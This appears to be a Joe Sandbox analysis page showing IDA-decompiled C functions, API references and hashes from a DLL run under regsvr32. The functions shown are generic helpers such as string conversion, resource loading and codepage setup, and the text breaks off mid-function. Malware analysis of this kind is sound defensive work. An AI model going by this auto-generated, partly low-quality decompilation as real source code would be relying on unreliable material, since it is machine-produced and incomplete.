Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Color$ObjectText
String ID:
API String ID: 829078354-0
Opcode ID: 089e1aa1949608e4f8fc9ed92e93b52c6bdd786333243718fed25a2e41b9f151
Instruction ID: 452fa0d3e8a3ffb8172c59ed8e57ccf74138eb0f5c5daf9710dab81d318874be
Opcode Fuzzy Hash: 089e1aa1949608e4f8fc9ed92e93b52c6bdd786333243718fed25a2e41b9f151
Instruction Fuzzy Hash: 5E014631500119ABEF51DF64CC85BAE7BE5FB40391F628521FA06C41E0CB72DE99CB65

Uniqueness

Uniqueness Score: -1.00%

Function 100662EB Relevance: 6.0, APIs: 4, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E100662EB(int __eax, short* _a4) {
				char* _v0;
				int _v8;
				char* _v16;
				char* _t7;
				short* _t10;
				int _t13;

				_t10 = _a4;
				__imp__#7(_t10);
				_t13 = __eax;
				_t7 = WideCharToMultiByte(0, 0, _t10, __eax, 0, 0, 0, 0);
				_v0 = _t7;
				__imp__#150(0, _t7);
				_v16 = _t7;
				WideCharToMultiByte(0, 0, _t10, _t13, _t7, _v8, 0, 0);
				return _v16;
			}

0x100662ed
0x100662f5
0x10066305
0x1006630d
0x10066311
0x10066315
0x10066321
0x1006632a
0x10066335

APIs

SysStringLen.OLEAUT32(?), ref: 100662F5
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 1006630D
SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 10066315
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,00000000), ref: 1006632A

Memory Dump Source

Source File: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Byte$CharMultiStringWide$Alloc
String ID:
API String ID: 3384502665-0
Opcode ID: 87a0039e1ad11cb0a077bef36b954f249cf38f39028b888fd3df62d1622ddd95
Instruction ID: 52293fc44d97842c963cef3f0e898a10eaeb9abd0be1ea3a3e9f6f90e78cd61c
Opcode Fuzzy Hash: 87a0039e1ad11cb0a077bef36b954f249cf38f39028b888fd3df62d1622ddd95
Instruction Fuzzy Hash: 99F0F8B21162397FA2209B6B8C8CCEBBF9CFE8B2B5B01451AF54882110D6759800CAF1

Uniqueness

Uniqueness Score: -1.00%

Function 1004704E Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1004704E(void* __ecx, CHAR* _a4) {
				void* __ebp;
				void* _t7;
				void* _t10;
				struct HRSRC__* _t16;
				struct HINSTANCE__* _t17;
				void* _t18;

				_t18 = __ecx;
				_t17 =  *(E10064B8B() + 0xc);
				if(_t17 == 0) {
					L2:
					return 0;
				}
				_t16 = FindResourceA(_t17, _a4, 5);
				if(_t16 != 0) {
					_t7 = LockResource(LoadResource(_t17, _t16));
					E10046FE0(_t18, _t7, SizeofResource(_t17, _t16));
					_t10 = 1;
					return _t10;
				}
				goto L2;
			}

0x10047051
0x10047058
0x1004705d
0x10047072
0x00000000
0x10047072
0x1004706c
0x10047070
0x10047080
0x10047094
0x1004709b
0x00000000
0x1004709c
0x00000000

APIs

FindResourceA.KERNEL32 ref: 10047066
LoadResource.KERNEL32(?,00000000), ref: 10047079
LockResource.KERNEL32(00000000), ref: 10047080
SizeofResource.KERNEL32(?,00000000), ref: 1004708A

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 42c928ff4350cea62c840b7c83348d4e6d70cd041f8d39dbb8b3e9ed65da7b59
Instruction ID: 98de7e2ec9a1a086657125352a4f775a9817d6ab3b7841ac0a89fd3b41209c5a
Opcode Fuzzy Hash: 42c928ff4350cea62c840b7c83348d4e6d70cd041f8d39dbb8b3e9ed65da7b59
Instruction Fuzzy Hash: 6BF02732205623BFE31457B55C8CE4B7AACFF89760B110036F60ED2111DA2198008274

Uniqueness

Uniqueness Score: -1.00%

Function 100669B6 Relevance: 6.0, APIs: 4, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E100669B6(intOrPtr _a4, intOrPtr _a8) {
				void* _t4;
				long _t5;
				long _t6;

				_t9 = _a4;
				if(_a4 != 0) {
					return E1006695B(_t9, _a8);
				}
				__eflags =  *0x10094ee4;
				if( *0x10094ee4 == 0) {
					_t6 = GetTickCount();
					 *0x10094ee4 =  *0x10094ee4 + 1;
					__eflags =  *0x10094ee4;
					 *0x10090690 = _t6;
				}
				_t4 = GetTickCount() -  *0x10090690;
				__eflags = _t4 - 0xea60;
				if(_t4 > 0xea60) {
					__imp__CoFreeUnusedLibraries();
					_t5 = GetTickCount();
					 *0x10090690 = _t5;
					return _t5;
				}
				return _t4;
			}

0x100669b6
0x100669bc
0x00000000
0x100669c2
0x100669c9
0x100669d6
0x100669d8
0x100669da
0x100669da
0x100669e0
0x100669e0
0x100669e7
0x100669ed
0x100669f2
0x100669f4
0x100669fa
0x100669fc
0x00000000
0x100669fc
0x10066a02

APIs

GetTickCount.KERNEL32 ref: 100669D8
GetTickCount.KERNEL32 ref: 100669E5
CoFreeUnusedLibraries.OLE32 ref: 100669F4
GetTickCount.KERNEL32 ref: 100669FA

Part of subcall function 1006695B: CoFreeUnusedLibraries.OLE32 ref: 100669A3
Part of subcall function 1006695B: OleUninitialize.OLE32 ref: 100669A9

Memory Dump Source

Source File: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CountTick$FreeLibrariesUnused$Uninitialize
String ID:
API String ID: 685759847-0
Opcode ID: 90f6154fa057d3e21715aa85aca292228c26b3f3d51e3d7482babad4e98b2c37
Instruction ID: 6207619e022a0815de0875c58a86fa78f9efedeaabeffe4551b9879c60d76fd0
Opcode Fuzzy Hash: 90f6154fa057d3e21715aa85aca292228c26b3f3d51e3d7482babad4e98b2c37
Instruction Fuzzy Hash: 05E01A34804275CFF718EFA0CC846593BA6FB49318F11842BE95D52164CB725C14CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 100111F1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E100111F1(void* __ecx) {
				intOrPtr* _t70;
				intOrPtr* _t95;
				intOrPtr* _t97;
				intOrPtr* _t99;
				signed int _t101;
				signed int* _t111;
				intOrPtr* _t136;
				void* _t139;
				void* _t141;

				E1001A9E0(0x100774b8, _t141);
				_t139 = __ecx;
				 *((intOrPtr*)(_t141 - 0x10)) = 0;
				_t70 =  *((intOrPtr*)(__ecx + 0x4c));
				_push(_t141 - 0x10);
				_push(0x10082220);
				_push(_t70);
				 *((intOrPtr*)(_t141 - 0x14)) = 0;
				if( *((intOrPtr*)( *_t70))() >= 0) {
					 *((intOrPtr*)(_t141 - 0x78)) = __ecx + 0xb8;
					 *((intOrPtr*)(_t141 - 0x70)) = __ecx + 0xc8;
					 *((intOrPtr*)(_t141 - 0x6c)) = __ecx + 0xcc;
					 *((intOrPtr*)(_t141 - 0x7c)) = 0x40;
					 *((intOrPtr*)(_t141 - 0x74)) = 0;
					 *((intOrPtr*)(_t141 - 0x58)) = 0;
					 *((intOrPtr*)(_t141 - 0x4c)) = 0;
					 *((intOrPtr*)(_t141 - 0x48)) = 0;
					E10017242(_t141 - 0x24);
					 *((intOrPtr*)(_t141 - 4)) = 0;
					_t136 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c)) + 0x1c));
					 *(_t141 - 0x68) = 0;
					_t111 = 0x1007e274;
					do {
						_t22 = _t111 - 4; // 0xfffffd3b
						 *((intOrPtr*)( *_t136 + 0x94))(_t139,  *_t22, _t141 - 0x24);
						if( *((short*)(_t141 - 0x1c)) != 0) {
							 *(_t141 - 0x68) =  *(_t141 - 0x68) |  *_t111;
						}
						_t111 =  &(_t111[2]);
					} while (_t111 < 0x1007e2b4);
					 *((intOrPtr*)( *_t136 + 0x94))(_t139, 0xfffffd40, _t141 - 0x24);
					 *((intOrPtr*)(_t141 - 0x64)) =  *((intOrPtr*)(_t141 - 0x1c));
					 *((intOrPtr*)( *_t136 + 0x94))(_t139, 0xfffffd43, _t141 - 0x24);
					 *((intOrPtr*)(_t141 - 0x60)) =  *((intOrPtr*)(_t141 - 0x1c));
					 *((intOrPtr*)( *_t136 + 0x94))(_t139, 0xfffffd34, _t141 - 0x24);
					 *((intOrPtr*)(_t141 - 0x54)) =  *((short*)(_t141 - 0x1c));
					 *((intOrPtr*)( *_t136 + 0x94))(_t139, 0xfffffd3f, _t141 - 0x24);
					 *((intOrPtr*)(_t141 - 0x50)) =  *((intOrPtr*)(_t141 - 0x1c));
					 *((intOrPtr*)( *_t136 + 0x94))(_t139, 0xfffffd41, _t141 - 0x24);
					_t95 =  *((intOrPtr*)(_t141 - 0x1c));
					_push(_t141 - 0x5c);
					_push(0x10082210);
					_push(_t95);
					if( *((intOrPtr*)( *_t95))() < 0) {
						 *(_t141 - 0x5c) =  *(_t141 - 0x5c) & 0x00000000;
					}
					_t97 =  *((intOrPtr*)(_t141 - 0x10));
					_push(_t141 - 0x3c);
					 *((intOrPtr*)(_t141 - 0x3c)) = 0x18;
					_push(_t141 - 0x7c);
					_push(_t97);
					if( *((intOrPtr*)( *_t97 + 0xc))() >= 0) {
						 *((intOrPtr*)(_t141 - 0x14)) = 1;
						 *((intOrPtr*)(_t139 + 0x70)) =  *((intOrPtr*)(_t141 - 0x38));
						 *((intOrPtr*)(_t139 + 0x60)) =  *((intOrPtr*)(_t141 - 0x30));
						 *((intOrPtr*)(_t139 + 0x64)) =  *((intOrPtr*)(_t141 - 0x2c));
					}
					_t99 =  *((intOrPtr*)(_t141 - 0x10));
					 *((intOrPtr*)( *_t99 + 8))(_t99);
					_t101 =  *(_t141 - 0x5c);
					if(_t101 != 0) {
						 *((intOrPtr*)( *_t101 + 8))(_t101);
					}
					__imp__#9(_t141 - 0x24);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t141 - 0xc));
				return  *((intOrPtr*)(_t141 - 0x14));
			}

0x100111f6
0x10011200
0x10011207
0x1001120a
0x1001120d
0x1001120e
0x10011213
0x10011216
0x1001121d
0x1001122a
0x10011233
0x1001123c
0x10011243
0x1001124a
0x1001124d
0x10011250
0x10011253
0x10011256
0x1001125e
0x10011261
0x10011264
0x10011267
0x1001126c
0x10011274
0x10011278
0x10011283
0x10011287
0x10011287
0x1001128a
0x1001128d
0x100112a3
0x100112af
0x100112bd
0x100112c9
0x100112d7
0x100112e4
0x100112f2
0x100112fe
0x1001130c
0x10011312
0x10011318
0x10011319
0x10011320
0x10011326
0x10011328
0x10011328
0x1001132c
0x10011332
0x10011336
0x1001133f
0x10011340
0x10011346
0x1001134b
0x10011352
0x10011358
0x1001135e
0x1001135e
0x10011361
0x10011367
0x1001136a
0x1001136f
0x10011374
0x10011374
0x1001137b
0x1001137b
0x10011389
0x10011391

APIs

__EH_prolog.LIBCMT ref: 100111F6
VariantClear.OLEAUT32(?), ref: 1001137B

Strings

@, xrefs: 10011243

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ClearH_prologVariant
String ID: @
API String ID: 1166855276-2766056989
Opcode ID: 74763efdbddfe6faaea3205c18e7340bc6e8e5c21243a0ebd22321a815eca83c
Instruction ID: 732040fbc72aaac26275145a538125735c8f6d6a95be78a8839e3f8427f1892a
Opcode Fuzzy Hash: 74763efdbddfe6faaea3205c18e7340bc6e8e5c21243a0ebd22321a815eca83c
Instruction Fuzzy Hash: 1551B474D002199FDB04CFA9C888AEEB7F9FF48304F10456AE516EB251E775A946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 1001C642 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E1001C642(void* __ebx, void* __edi) {
				char _v17;
				signed char _v18;
				struct _cpinfo _v24;
				char _v280;
				char _v536;
				char _v792;
				char _v1304;
				void* _t43;
				char _t44;
				signed char _t45;
				void* _t55;
				signed int _t56;
				signed char _t64;
				intOrPtr* _t66;
				signed int _t68;
				signed int _t70;
				signed int _t71;
				signed char _t76;
				signed char _t77;
				signed char* _t78;
				void* _t81;
				void* _t87;
				void* _t88;

				if(GetCPInfo( *0x100967dc,  &_v24) == 1) {
					_t44 = 0;
					do {
						 *((char*)(_t87 + _t44 - 0x114)) = _t44;
						_t44 = _t44 + 1;
					} while (_t44 < 0x100);
					_t45 = _v18;
					_v280 = 0x20;
					if(_t45 == 0) {
						L9:
						E10022358(1,  &_v280, 0x100,  &_v1304,  *0x100967dc,  *0x10096a84, 0);
						E10021F1A( *0x10096a84, 0x100,  &_v280, 0x100,  &_v536, 0x100,  *0x100967dc, 0);
						E10021F1A( *0x10096a84, 0x200,  &_v280, 0x100,  &_v792, 0x100,  *0x100967dc, 0);
						_t55 = 0;
						_t66 =  &_v1304;
						do {
							_t76 =  *_t66;
							if((_t76 & 0x00000001) == 0) {
								if((_t76 & 0x00000002) == 0) {
									 *(_t55 + 0x10096880) =  *(_t55 + 0x10096880) & 0x00000000;
									goto L16;
								}
								 *(_t55 + 0x10096981) =  *(_t55 + 0x10096981) | 0x00000020;
								_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x314));
								L12:
								 *(_t55 + 0x10096880) = _t77;
								goto L16;
							}
							 *(_t55 + 0x10096981) =  *(_t55 + 0x10096981) | 0x00000010;
							_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x214));
							goto L12;
							L16:
							_t55 = _t55 + 1;
							_t66 = _t66 + 2;
						} while (_t55 < 0x100);
						return _t55;
					}
					_t78 =  &_v17;
					do {
						_t68 =  *_t78 & 0x000000ff;
						_t56 = _t45 & 0x000000ff;
						if(_t56 <= _t68) {
							_t81 = _t87 + _t56 - 0x114;
							_t70 = _t68 - _t56 + 1;
							_t71 = _t70 >> 2;
							memset(_t81 + _t71, memset(_t81, 0x20202020, _t71 << 2), (_t70 & 0x00000003) << 0);
							_t88 = _t88 + 0x18;
						}
						_t78 =  &(_t78[2]);
						_t45 =  *((intOrPtr*)(_t78 - 1));
					} while (_t45 != 0);
					goto L9;
				}
				_t43 = 0;
				do {
					if(_t43 < 0x41 || _t43 > 0x5a) {
						if(_t43 < 0x61 || _t43 > 0x7a) {
							 *(_t43 + 0x10096880) =  *(_t43 + 0x10096880) & 0x00000000;
						} else {
							 *(_t43 + 0x10096981) =  *(_t43 + 0x10096981) | 0x00000020;
							_t64 = _t43 - 0x20;
							goto L22;
						}
					} else {
						 *(_t43 + 0x10096981) =  *(_t43 + 0x10096981) | 0x00000010;
						_t64 = _t43 + 0x20;
						L22:
						 *(_t43 + 0x10096880) = _t64;
					}
					_t43 = _t43 + 1;
				} while (_t43 < 0x100);
				return _t43;
			}

0x1001c65f
0x1001c665
0x1001c66c
0x1001c66c
0x1001c673
0x1001c674
0x1001c678
0x1001c67b
0x1001c684
0x1001c6bd
0x1001c6dc
0x1001c700
0x1001c728
0x1001c730
0x1001c732
0x1001c738
0x1001c738
0x1001c73e
0x1001c759
0x1001c76b
0x00000000
0x1001c76b
0x1001c75b
0x1001c762
0x1001c74e
0x1001c74e
0x00000000
0x1001c74e
0x1001c740
0x1001c747
0x00000000
0x1001c772
0x1001c772
0x1001c774
0x1001c775
0x00000000
0x1001c738
0x1001c688
0x1001c68b
0x1001c68b
0x1001c68e
0x1001c693
0x1001c697
0x1001c69e
0x1001c6a6
0x1001c6b0
0x1001c6b0
0x1001c6b0
0x1001c6b3
0x1001c6b4
0x1001c6b7
0x00000000
0x1001c6bc
0x1001c77b
0x1001c782
0x1001c785
0x1001c7a3
0x1001c7b8
0x1001c7aa
0x1001c7aa
0x1001c7b3
0x00000000
0x1001c7b3
0x1001c78c
0x1001c78c
0x1001c795
0x1001c798
0x1001c798
0x1001c798
0x1001c7bf
0x1001c7c0
0x1001c7c6

APIs

GetCPInfo.KERNEL32(?,?), ref: 1001C656

Strings

, xrefs: 1001C67B
, xrefs: 1001C69F

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: 63f4cb8038a7adba9c0ffa763783a4ee5ddc845b833478079d2739256f93649e
Instruction ID: 4e8f11f5bc83814eec39e5d767a405822d8ecbc23e13b5949f203678dce65c58
Opcode Fuzzy Hash: 63f4cb8038a7adba9c0ffa763783a4ee5ddc845b833478079d2739256f93649e
Instruction Fuzzy Hash: 104128315083AC5EEB19CA24CC99FEABF98EB06744F1005E6D589CB1D2C371C988DB62

Uniqueness

Uniqueness Score: -1.00%

Function 10016129 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E10016129(void* __ecx, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				void* __ebx;
				struct HWND__* _t22;
				signed int _t23;
				intOrPtr _t33;
				intOrPtr _t44;
				void* _t48;
				void* _t49;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t44 = _a12;
				if(_t44 != 0) {
					_t22 =  *(_t44 + 0x1c);
				} else {
					_t22 = 0;
				}
				_t33 = _a4;
				_t23 = IsChild( *(_t33 + 0x1c), _t22);
				if(_t23 != 0) {
					if(_t44 == 0) {
						L7:
						_t23 = _a8;
						if(_t23 != _t44) {
							if(_t23 == 0 || E10016079(_t23) == 0) {
								if(_t44 != 0 && _v8 != 0) {
									goto L18;
								}
